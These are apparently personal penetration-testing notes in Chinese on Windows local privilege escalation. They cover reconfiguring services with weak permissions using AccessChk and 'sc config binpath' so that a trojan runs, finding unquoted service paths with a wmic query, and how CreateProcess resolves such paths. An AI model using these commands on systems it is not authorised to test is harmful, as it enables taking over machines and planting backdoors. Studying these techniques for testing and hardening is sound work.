该方法是由于服务的管理配置错误，导入本地普通用户对一些服务拥有过多的权限，例如修改服务配置等。
可制作木马文件上传至服务器，并将某服务的路径更改为木马文件你，服务启动则会执行恶意代码
#使用AccessChk工具查看当前用户有过高权限的服务项
accesschk.exe -uwcqv "当前用户" *  //查看可以访问的服务
accesschk.exe /accepteula -ucqv 服务名字 //仔细查看
sc config "服务名" binpath="C:\\1.exe"  #将指定服务的路径重定向为木马后门
sc start "服务名"  #启动该服务

//注意依赖项

https://sohvaxus.github.io/content/winxp-sp1-privesc.html

不带引号的服务路径

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\\windows\\\\" |findstr /i /v """

原理：

当Windows服务配置不当，其binpath并未使用双引号括起来，会导致存在提权漏洞。(根本原因在于CreateProcess函数对路径的处理)
如果传入的文件路径当中包含空格，则应该用引号包裹完整的文件路径，否则，将无法准确识别文件路径。比如对于路径c:\\program files\\sub dir\\program name，CreateProcess会按照以下路径优先级搜索
c:\\program.exe c:\\program files\\sub.exe c:\\program files\\sub dir\\program.exec:\\program files\\sub dir\\program name.exe...